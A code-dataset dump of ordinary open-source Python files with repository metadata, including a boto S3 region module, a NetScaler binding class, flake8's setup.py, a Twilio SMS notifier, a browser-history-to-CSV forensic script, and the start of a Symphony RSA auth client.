] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | boto/s3/__init__.py | adastreamer/boto | ce472cbbcffd06298fdd0c980d5bfcdcee875498 | [
"MIT"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | boto/s3/__init__.py | adastreamer/boto | ce472cbbcffd06298fdd0c980d5bfcdcee875498 | [
"MIT"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.regioninfo import RegionInfo
class S3RegionInfo(RegionInfo):
def connect(self, **kw_params):
"""
Connect to this Region's endpoint. Returns an connection
object pointing to the endpoint associated with this region.
You may pass any of the arguments accepted by the connection
class's constructor as keyword arguments and they will be
passed along to the connection object.
:rtype: Connection object
:return: The connection to this regions endpoint
"""
if self.connection_cls:
return self.connection_cls(host=self.endpoint, **kw_params)
def regions():
"""
Get all available regions for the Amazon S3 service.
:rtype: list
:return: A list of :class:`boto.regioninfo.RegionInfo`
"""
from .connection import S3Connection
return [S3RegionInfo(name='us-east-1',
endpoint='s3.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-gov-west-1',
endpoint='s3-us-gov-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-west-1',
endpoint='s3-us-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-west-2',
endpoint='s3-us-west-2.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-northeast-1',
endpoint='s3-ap-northeast-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-southeast-1',
endpoint='s3-ap-southeast-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-southeast-2',
endpoint='s3-ap-southeast-2.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='eu-west-1',
endpoint='s3-eu-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='sa-east-1',
endpoint='s3-sa-east-1.amazonaws.com',
connection_cls=S3Connection),
]
def connect_to_region(region_name, **kw_params):
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
| 42.136364 | 74 | 0.629989 |
from boto.regioninfo import RegionInfo
class S3RegionInfo(RegionInfo):
def connect(self, **kw_params):
if self.connection_cls:
return self.connection_cls(host=self.endpoint, **kw_params)
def regions():
from .connection import S3Connection
return [S3RegionInfo(name='us-east-1',
endpoint='s3.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-gov-west-1',
endpoint='s3-us-gov-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-west-1',
endpoint='s3-us-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-west-2',
endpoint='s3-us-west-2.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-northeast-1',
endpoint='s3-ap-northeast-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-southeast-1',
endpoint='s3-ap-southeast-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-southeast-2',
endpoint='s3-ap-southeast-2.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='eu-west-1',
endpoint='s3-eu-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='sa-east-1',
endpoint='s3-sa-east-1.amazonaws.com',
connection_cls=S3Connection),
]
def connect_to_region(region_name, **kw_params):
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
| true | true |
f72371642afbe55c7e8291b7b219c446c8a26353 | 4,069 | py | Python | nitro-python/nssrc/com/citrix/netscaler/nitro/resource/config/feo/feopolicy_binding.py | culbertm/NSttyPython | ff9f6aedae3fb8495342cd0fc4247c819cf47397 | [
"Apache-2.0"
] | null | null | null | nitro-python/nssrc/com/citrix/netscaler/nitro/resource/config/feo/feopolicy_binding.py | culbertm/NSttyPython | ff9f6aedae3fb8495342cd0fc4247c819cf47397 | [
"Apache-2.0"
] | null | null | null | nitro-python/nssrc/com/citrix/netscaler/nitro/resource/config/feo/feopolicy_binding.py | culbertm/NSttyPython | ff9f6aedae3fb8495342cd0fc4247c819cf47397 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2008-2016 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class feopolicy_binding(base_resource):
""" Binding class showing the resources that can be bound to feopolicy_binding.
"""
def __init__(self) :
self._name = None
self.feopolicy_csvserver_binding = []
self.feopolicy_lbvserver_binding = []
self.feopolicy_feoglobal_binding = []
@property
def name(self) :
r"""The name of the front end optimization policy.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
r"""The name of the front end optimization policy.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def feopolicy_csvserver_bindings(self) :
r"""csvserver that can be bound to feopolicy.
"""
try :
return self._feopolicy_csvserver_binding
except Exception as e:
raise e
@property
def feopolicy_lbvserver_bindings(self) :
r"""lbvserver that can be bound to feopolicy.
"""
try :
return self._feopolicy_lbvserver_binding
except Exception as e:
raise e
@property
def feopolicy_feoglobal_bindings(self) :
r"""feoglobal that can be bound to feopolicy.
"""
try :
return self._feopolicy_feoglobal_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(feopolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.feopolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, name="", option_="") :
r""" Use this API to fetch feopolicy_binding resource.
"""
try :
if not name :
obj = feopolicy_binding()
response = obj.get_resources(service, option_)
elif type(name) is not list :
obj = feopolicy_binding()
obj.name = name
response = obj.get_resource(service)
else :
if name and len(name) > 0 :
obj = [feopolicy_binding() for _ in range(len(name))]
for i in range(len(name)) :
obj[i].name = name[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class feopolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.feopolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.feopolicy_binding = [feopolicy_binding() for _ in range(length)]
| 29.485507 | 119 | 0.718113 |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class feopolicy_binding(base_resource):
def __init__(self) :
self._name = None
self.feopolicy_csvserver_binding = []
self.feopolicy_lbvserver_binding = []
self.feopolicy_feoglobal_binding = []
@property
def name(self) :
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
try :
self._name = name
except Exception as e:
raise e
@property
def feopolicy_csvserver_bindings(self) :
try :
return self._feopolicy_csvserver_binding
except Exception as e:
raise e
@property
def feopolicy_lbvserver_bindings(self) :
try :
return self._feopolicy_lbvserver_binding
except Exception as e:
raise e
@property
def feopolicy_feoglobal_bindings(self) :
try :
return self._feopolicy_feoglobal_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
try :
result = service.payload_formatter.string_to_resource(feopolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.feopolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, name="", option_="") :
try :
if not name :
obj = feopolicy_binding()
response = obj.get_resources(service, option_)
elif type(name) is not list :
obj = feopolicy_binding()
obj.name = name
response = obj.get_resource(service)
else :
if name and len(name) > 0 :
obj = [feopolicy_binding() for _ in range(len(name))]
for i in range(len(name)) :
obj[i].name = name[i];
response[i] = obj[i].get_resource(service)
return response
except Exception as e:
raise e
class feopolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.feopolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.feopolicy_binding = [feopolicy_binding() for _ in range(length)]
| true | true |
f723716af0d7e1373054c1309717abfa1d2af972 | 5,495 | py | Python | setup.py | Alesh/flake8 | 9320150e2566742c10659b1e3382fb83aadf9e5a | [
"MIT"
] | null | null | null | setup.py | Alesh/flake8 | 9320150e2566742c10659b1e3382fb83aadf9e5a | [
"MIT"
] | null | null | null | setup.py | Alesh/flake8 | 9320150e2566742c10659b1e3382fb83aadf9e5a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Packaging logic for Flake8."""
import functools
import io
import os
import sys
import setuptools
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'src')) # noqa
import flake8
# NOTE(sigmavirus24): When updating these requirements, update them in
# setup.cfg as well.
requires = [
# We document the reasoning for using ranges here:
# http://flake8.pycqa.org/en/latest/faq.html#why-does-flake8-use-ranges-for-its-dependencies
# And in which releases we will update those ranges here:
# http://flake8.pycqa.org/en/latest/internal/releases.html#releasing-flake8
"entrypoints >= 0.3.0, < 0.4.0",
"pyflakes >= 2.1.0, < 2.2.0",
"pycodestyle >= 2.5.0, < 2.6.0",
"mccabe >= 0.6.0, < 0.7.0",
]
extras_require = {
":python_version<'3.4'": ['enum34'],
":python_version<'3.5'": ['typing'],
":python_version<'3.2'": ['configparser'],
}
if int(setuptools.__version__.split('.')[0]) < 18:
extras_require = {}
if sys.version_info < (3, 4):
requires.append('enum34')
if sys.version_info < (3, 2):
requires.append('configparser')
def get_long_description():
"""Generate a long description from the README file."""
descr = []
for fname in ('README.rst',):
with io.open(fname, encoding='utf-8') as f:
descr.append(f.read())
return '\n\n'.join(descr)
PEP8 = 'pycodestyle'
_FORMAT = '{0}.{1} = {0}:{1}'
PEP8_PLUGIN = functools.partial(_FORMAT.format, PEP8)
setuptools.setup(
name="flake8",
license="MIT",
version=flake8.__version__,
description="the modular source code checker: pep8, pyflakes and co",
long_description=get_long_description(),
author="Tarek Ziade",
author_email="tarek@ziade.org",
maintainer="Ian Stapleton Cordasco",
maintainer_email="graffatcolmingov@gmail.com",
url="https://gitlab.com/pycqa/flake8",
package_dir={"": "src"},
packages=[
"flake8",
"flake8.api",
"flake8.formatting",
"flake8.main",
"flake8.options",
"flake8.plugins",
],
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
install_requires=requires,
extras_require=extras_require,
entry_points={
'distutils.commands': [
'flake8 = flake8.main.setuptools_command:Flake8'
],
'console_scripts': [
'flake8 = flake8.main.cli:main'
],
'flake8.extension': [
'F = flake8.plugins.pyflakes:FlakesChecker',
# PEP-0008 checks provided by PyCQA/pycodestyle
PEP8_PLUGIN('tabs_or_spaces'),
PEP8_PLUGIN('tabs_obsolete'),
PEP8_PLUGIN('trailing_whitespace'),
PEP8_PLUGIN('trailing_blank_lines'),
PEP8_PLUGIN('maximum_line_length'),
PEP8_PLUGIN('blank_lines'),
PEP8_PLUGIN('extraneous_whitespace'),
PEP8_PLUGIN('whitespace_around_keywords'),
PEP8_PLUGIN('missing_whitespace_after_import_keyword'),
PEP8_PLUGIN('missing_whitespace'),
PEP8_PLUGIN('indentation'),
PEP8_PLUGIN('continued_indentation'),
PEP8_PLUGIN('whitespace_before_parameters'),
PEP8_PLUGIN('whitespace_around_operator'),
PEP8_PLUGIN('missing_whitespace_around_operator'),
PEP8_PLUGIN('whitespace_around_comma'),
PEP8_PLUGIN('whitespace_around_named_parameter_equals'),
PEP8_PLUGIN('whitespace_before_comment'),
PEP8_PLUGIN('imports_on_separate_lines'),
PEP8_PLUGIN('module_imports_on_top_of_file'),
PEP8_PLUGIN('compound_statements'),
PEP8_PLUGIN('explicit_line_join'),
PEP8_PLUGIN('break_after_binary_operator'),
PEP8_PLUGIN('break_before_binary_operator'),
PEP8_PLUGIN('comparison_to_singleton'),
PEP8_PLUGIN('comparison_negative'),
PEP8_PLUGIN('comparison_type'),
PEP8_PLUGIN('ambiguous_identifier'),
PEP8_PLUGIN('bare_except'),
PEP8_PLUGIN('maximum_doc_length'),
PEP8_PLUGIN('python_3000_has_key'),
PEP8_PLUGIN('python_3000_raise_comma'),
PEP8_PLUGIN('python_3000_not_equal'),
PEP8_PLUGIN('python_3000_backticks'),
PEP8_PLUGIN('python_3000_invalid_escape_sequence'),
PEP8_PLUGIN('python_3000_async_await_keywords'),
],
'flake8.report': [
'default = flake8.formatting.default:Default',
'pylint = flake8.formatting.default:Pylint',
'quiet-filename = flake8.formatting.default:FilenameOnly',
'quiet-nothing = flake8.formatting.default:Nothing',
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Framework :: Flake8",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Quality Assurance",
],
)
| 36.390728 | 96 | 0.620928 |
import functools
import io
import os
import sys
import setuptools
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'src'))
import flake8
requires = [
2.1.0, < 2.2.0",
"pycodestyle >= 2.5.0, < 2.6.0",
"mccabe >= 0.6.0, < 0.7.0",
]
extras_require = {
":python_version<'3.4'": ['enum34'],
":python_version<'3.5'": ['typing'],
":python_version<'3.2'": ['configparser'],
}
if int(setuptools.__version__.split('.')[0]) < 18:
extras_require = {}
if sys.version_info < (3, 4):
requires.append('enum34')
if sys.version_info < (3, 2):
requires.append('configparser')
def get_long_description():
descr = []
for fname in ('README.rst',):
with io.open(fname, encoding='utf-8') as f:
descr.append(f.read())
return '\n\n'.join(descr)
PEP8 = 'pycodestyle'
_FORMAT = '{0}.{1} = {0}:{1}'
PEP8_PLUGIN = functools.partial(_FORMAT.format, PEP8)
setuptools.setup(
name="flake8",
license="MIT",
version=flake8.__version__,
description="the modular source code checker: pep8, pyflakes and co",
long_description=get_long_description(),
author="Tarek Ziade",
author_email="tarek@ziade.org",
maintainer="Ian Stapleton Cordasco",
maintainer_email="graffatcolmingov@gmail.com",
url="https://gitlab.com/pycqa/flake8",
package_dir={"": "src"},
packages=[
"flake8",
"flake8.api",
"flake8.formatting",
"flake8.main",
"flake8.options",
"flake8.plugins",
],
python_requires=">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*",
install_requires=requires,
extras_require=extras_require,
entry_points={
'distutils.commands': [
'flake8 = flake8.main.setuptools_command:Flake8'
],
'console_scripts': [
'flake8 = flake8.main.cli:main'
],
'flake8.extension': [
'F = flake8.plugins.pyflakes:FlakesChecker',
PEP8_PLUGIN('tabs_or_spaces'),
PEP8_PLUGIN('tabs_obsolete'),
PEP8_PLUGIN('trailing_whitespace'),
PEP8_PLUGIN('trailing_blank_lines'),
PEP8_PLUGIN('maximum_line_length'),
PEP8_PLUGIN('blank_lines'),
PEP8_PLUGIN('extraneous_whitespace'),
PEP8_PLUGIN('whitespace_around_keywords'),
PEP8_PLUGIN('missing_whitespace_after_import_keyword'),
PEP8_PLUGIN('missing_whitespace'),
PEP8_PLUGIN('indentation'),
PEP8_PLUGIN('continued_indentation'),
PEP8_PLUGIN('whitespace_before_parameters'),
PEP8_PLUGIN('whitespace_around_operator'),
PEP8_PLUGIN('missing_whitespace_around_operator'),
PEP8_PLUGIN('whitespace_around_comma'),
PEP8_PLUGIN('whitespace_around_named_parameter_equals'),
PEP8_PLUGIN('whitespace_before_comment'),
PEP8_PLUGIN('imports_on_separate_lines'),
PEP8_PLUGIN('module_imports_on_top_of_file'),
PEP8_PLUGIN('compound_statements'),
PEP8_PLUGIN('explicit_line_join'),
PEP8_PLUGIN('break_after_binary_operator'),
PEP8_PLUGIN('break_before_binary_operator'),
PEP8_PLUGIN('comparison_to_singleton'),
PEP8_PLUGIN('comparison_negative'),
PEP8_PLUGIN('comparison_type'),
PEP8_PLUGIN('ambiguous_identifier'),
PEP8_PLUGIN('bare_except'),
PEP8_PLUGIN('maximum_doc_length'),
PEP8_PLUGIN('python_3000_has_key'),
PEP8_PLUGIN('python_3000_raise_comma'),
PEP8_PLUGIN('python_3000_not_equal'),
PEP8_PLUGIN('python_3000_backticks'),
PEP8_PLUGIN('python_3000_invalid_escape_sequence'),
PEP8_PLUGIN('python_3000_async_await_keywords'),
],
'flake8.report': [
'default = flake8.formatting.default:Default',
'pylint = flake8.formatting.default:Pylint',
'quiet-filename = flake8.formatting.default:FilenameOnly',
'quiet-nothing = flake8.formatting.default:Nothing',
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Framework :: Flake8",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Quality Assurance",
],
)
| true | true |
f72371fab6acdaffc73d69c8446bc7446f1ef5eb | 1,603 | py | Python | old stuff/web_deface/notifs/twilio_sms.py | duongsky96/RiskAssessmentFramework | a675220461d074841f63c23ab013530e33eb6950 | [
"MIT"
] | 238 | 2018-12-20T07:48:43.000Z | 2022-03-31T19:06:10.000Z | old stuff/web_deface/notifs/twilio_sms.py | duongsky96/RiskAssessmentFramework | a675220461d074841f63c23ab013530e33eb6950 | [
"MIT"
] | 62 | 2020-08-26T20:26:36.000Z | 2020-08-26T20:28:47.000Z | old stuff/web_deface/notifs/twilio_sms.py | duongsky96/RiskAssessmentFramework | a675220461d074841f63c23ab013530e33eb6950 | [
"MIT"
] | 85 | 2018-12-19T12:45:31.000Z | 2022-03-29T19:09:48.000Z | # -*- coding: utf-8 -*-
u"""Twilio module.
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jan 26 2019
Version: 1.1
"""
from twilio.rest import Client
class Twilio():
"""Initilize the Twilio."""
def __init__(self, cred):
"""Init logger params.
Args:
-----
modulename (str): Twilio
cred (dict): Twilio credentials
"""
self.account_sid = cred['twilio_sid']
self.account_token = cred['twilio_token']
self.twilio_from = cred['twilio_from']
self.twilio_to = cred['twilio_to']
self.client = Client(self.account_sid, self.account_token)
@staticmethod
def generatemessage(msg):
"""
Generate message by attaching the current CPU time.
Args:
-----
:msg : str
Message to send
Returns:
--------
str: Message appended with CPU time
"""
message = (str(msg))
return message
def notify(self, msg):
"""
Send the generated message.
Args:
-----
:msg : str
Message to send
Returns:
--------
None
"""
try:
self.client.messages \
.create(
body=self.generatemessage(msg),
from_=self.twilio_from,
to=self.twilio_to
)
except Exception as e:
print("[!] Error in sending SMS: ", str(e))
return
print("[+] SMS notification sent.")
return
| 21.958904 | 73 | 0.495321 |
from twilio.rest import Client
class Twilio():
def __init__(self, cred):
self.account_sid = cred['twilio_sid']
self.account_token = cred['twilio_token']
self.twilio_from = cred['twilio_from']
self.twilio_to = cred['twilio_to']
self.client = Client(self.account_sid, self.account_token)
@staticmethod
def generatemessage(msg):
message = (str(msg))
return message
def notify(self, msg):
try:
self.client.messages \
.create(
body=self.generatemessage(msg),
from_=self.twilio_from,
to=self.twilio_to
)
except Exception as e:
print("[!] Error in sending SMS: ", str(e))
return
print("[+] SMS notification sent.")
return
| true | true |
f72372652df9b3e3b99085021eb6e8e17b451670 | 4,093 | py | Python | browserHist2csv.py | maTWed/forensics | 9f238263b10d6e67a0f3da2e2cdb531ad2b7b611 | [
"MIT"
] | null | null | null | browserHist2csv.py | maTWed/forensics | 9f238263b10d6e67a0f3da2e2cdb531ad2b7b611 | [
"MIT"
] | null | null | null | browserHist2csv.py | maTWed/forensics | 9f238263b10d6e67a0f3da2e2cdb531ad2b7b611 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Browsing History to csv
# by:maTWed
# updated: 4/5/2022
# Created for internal use do to all the browsing history investigation
# Instructions: Copy Chrome & Firefox browsing DB to the directory of this script
# Or use 'get_browsing_history.sh' to collect the history and place them in this script's directory.
# TODO: Creat a function that connects to the smb share and copies the
# browsing files to local machine then gathers the data.
import os, time, datetime, operator, string, sqlite3, csv, argparse
def firefox_history():
if not os.path.exists(fox_db):
print("[-] Firefox DB not found!")
else:
db = sqlite3.connect(fox_db)
cursor = db.cursor()
cursor.execute("SELECT * from moz_places")
url_data = (cursor.fetchall())
db = sqlite3.connect(fox_db)
cursor = db.cursor()
cursor.execute("SELECT * from moz_historyvisits")
browsing_data = (cursor.fetchall())
for record in browsing_data:
url_reference = record[2]
for saved_url in url_data:
if saved_url[0] == url_reference:
visit_url = saved_url[1]
visit_time = str(datetime.datetime(1970,1,1)
+ datetime.timedelta(microseconds=record[3], hours=-4))
visit_time = visit_time[:-7]
visit_line = visit_time + "," + "Website visited (Firefox)" + "," \
+ "," + visit_url + "," + username + "," + visit_time + "," \
+ "Firefox history" + "," + "\places.sqlite" + "\n"
timeline_csv.write(visit_line)
print("[+] FIREFOX HISTORY ADDED TO THE TIMELINE. \n")
def chrome_history():
if not os.path.exists(chrome_db):
print("[-] Chrome DB not found!")
else:
db = sqlite3.connect(chrome_db)
cursor = db.cursor()
cursor.execute("SELECT * from urls")
browsing_data = (cursor.fetchall())
for record in browsing_data:
visit_time = str(datetime.datetime(1601,1,1) \
+ datetime.timedelta(microseconds=record[5]))
if visit_time[:4] == "1601":
pass
else:
visit_time = str(datetime.datetime.strptime(
visit_time, "%Y-%m-%d %H:%M:%S.%f"))
visit_time = visit_time[:-7]
visit_title = record[2]
visit_title = visit_title.replace(",", "")
visit_url = record[1]
visit_line = visit_time + "," + "Website visited (Chrome)" + "," \
+ visit_title + "," + visit_url + "," + username + "," \
+ visit_time + "," + "Google Chrome history" + "," \
+ "History" + "\n"
timeline_csv.write(visit_line)
print("[+] CHROME HISTORY ADDED TO THE TIMELINE.\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Open Firefox & Chrome browsing history databases and create a csv with the data')
parser.add_argument('-u', '--username', type=str, metavar='', help='Username of the data owner')
args = parser.parse_args()
# Variables
username = args.username
dir = os.getcwd()
chrome_db = dir + r"/History"
fox_db = dir + r"/places.sqlite"
timeline_csv = open("timeline.csv", "a")
# Function Calls
firefox_history()
chrome_history()
timeline_csv.close()
# creating the csv & adding column headers
with open("timeline.csv") as f:
timeline_csv = csv.reader(f, delimiter=",")
sorted_timeline = sorted(timeline_csv, key=operator.itemgetter(0),
reverse=True)
with open("timeline.csv", "w") as f:
fileWriter = csv.writer(f, delimiter=",")
header_row = "Artefact Timestamp", "Action", "Filename", "Full Path", \
"User", "File Accessed", "Source", "Source File"
fileWriter.writerow(header_row)
for row in sorted_timeline:
fileWriter.writerow(row)
| 37.550459 | 131 | 0.576839 |
# TODO: Creat a function that connects to the smb share and copies the
# browsing files to local machine then gathers the data.
import os, time, datetime, operator, string, sqlite3, csv, argparse
def firefox_history():
if not os.path.exists(fox_db):
print("[-] Firefox DB not found!")
else:
db = sqlite3.connect(fox_db)
cursor = db.cursor()
cursor.execute("SELECT * from moz_places")
url_data = (cursor.fetchall())
db = sqlite3.connect(fox_db)
cursor = db.cursor()
cursor.execute("SELECT * from moz_historyvisits")
browsing_data = (cursor.fetchall())
for record in browsing_data:
url_reference = record[2]
for saved_url in url_data:
if saved_url[0] == url_reference:
visit_url = saved_url[1]
visit_time = str(datetime.datetime(1970,1,1)
+ datetime.timedelta(microseconds=record[3], hours=-4))
visit_time = visit_time[:-7]
visit_line = visit_time + "," + "Website visited (Firefox)" + "," \
+ "," + visit_url + "," + username + "," + visit_time + "," \
+ "Firefox history" + "," + "\places.sqlite" + "\n"
timeline_csv.write(visit_line)
print("[+] FIREFOX HISTORY ADDED TO THE TIMELINE. \n")
def chrome_history():
if not os.path.exists(chrome_db):
print("[-] Chrome DB not found!")
else:
db = sqlite3.connect(chrome_db)
cursor = db.cursor()
cursor.execute("SELECT * from urls")
browsing_data = (cursor.fetchall())
for record in browsing_data:
visit_time = str(datetime.datetime(1601,1,1) \
+ datetime.timedelta(microseconds=record[5]))
if visit_time[:4] == "1601":
pass
else:
visit_time = str(datetime.datetime.strptime(
visit_time, "%Y-%m-%d %H:%M:%S.%f"))
visit_time = visit_time[:-7]
visit_title = record[2]
visit_title = visit_title.replace(",", "")
visit_url = record[1]
visit_line = visit_time + "," + "Website visited (Chrome)" + "," \
+ visit_title + "," + visit_url + "," + username + "," \
+ visit_time + "," + "Google Chrome history" + "," \
+ "History" + "\n"
timeline_csv.write(visit_line)
print("[+] CHROME HISTORY ADDED TO THE TIMELINE.\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Open Firefox & Chrome browsing history databases and create a csv with the data')
parser.add_argument('-u', '--username', type=str, metavar='', help='Username of the data owner')
args = parser.parse_args()
# Variables
username = args.username
dir = os.getcwd()
chrome_db = dir + r"/History"
fox_db = dir + r"/places.sqlite"
timeline_csv = open("timeline.csv", "a")
# Function Calls
firefox_history()
chrome_history()
timeline_csv.close()
# creating the csv & adding column headers
with open("timeline.csv") as f:
timeline_csv = csv.reader(f, delimiter=",")
sorted_timeline = sorted(timeline_csv, key=operator.itemgetter(0),
reverse=True)
with open("timeline.csv", "w") as f:
fileWriter = csv.writer(f, delimiter=",")
header_row = "Artefact Timestamp", "Action", "Filename", "Full Path", \
"User", "File Accessed", "Source", "Source File"
fileWriter.writerow(header_row)
for row in sorted_timeline:
fileWriter.writerow(row)
| true | true |
f723729324811ada91d71604306624d23a7791f7 | 129 | py | Python | src/CursoEmvideo/ex005.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex005.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | src/CursoEmvideo/ex005.py | kessiarodrigues/Python-Course | 2e6097af4475d826c2b242d4699aec72301060f7 | [
"MIT"
] | null | null | null | n = int(input('Digite um número: '))
n1 = n + 1
n2 = n - 1
print('O antecessor de {} é {} e o sucessor é {}'.format(n, n2, n1)) | 21.5 | 68 | 0.55814 | n = int(input('Digite um número: '))
n1 = n + 1
n2 = n - 1
print('O antecessor de {} é {} e o sucessor é {}'.format(n, n2, n1)) | true | true |
f723736c92eaaee1e47d1c8e3f0f9f8004962057 | 5,581 | py | Python | sym_api_client_python/auth/rsa_auth.py | 3tilley/symphony-api-client-python | 8a743c27bcb2bba3fb22493c5494a19c78961ff4 | [
"MIT"
] | null | null | null | sym_api_client_python/auth/rsa_auth.py | 3tilley/symphony-api-client-python | 8a743c27bcb2bba3fb22493c5494a19c78961ff4 | [
"MIT"
] | null | null | null | sym_api_client_python/auth/rsa_auth.py | 3tilley/symphony-api-client-python | 8a743c27bcb2bba3fb22493c5494a19c78961ff4 | [
"MIT"
] | null | null | null | import json
import requests
import datetime
import time
import logging
from .auth_endpoint_constants import auth_endpoint_constants
from requests import Session
from jose import jwt
from ..clients.api_client import APIClient
from ..exceptions.UnauthorizedException import UnauthorizedException
from ..exceptions.MaxRetryException import MaxRetryException
class SymBotRSAAuth(APIClient):
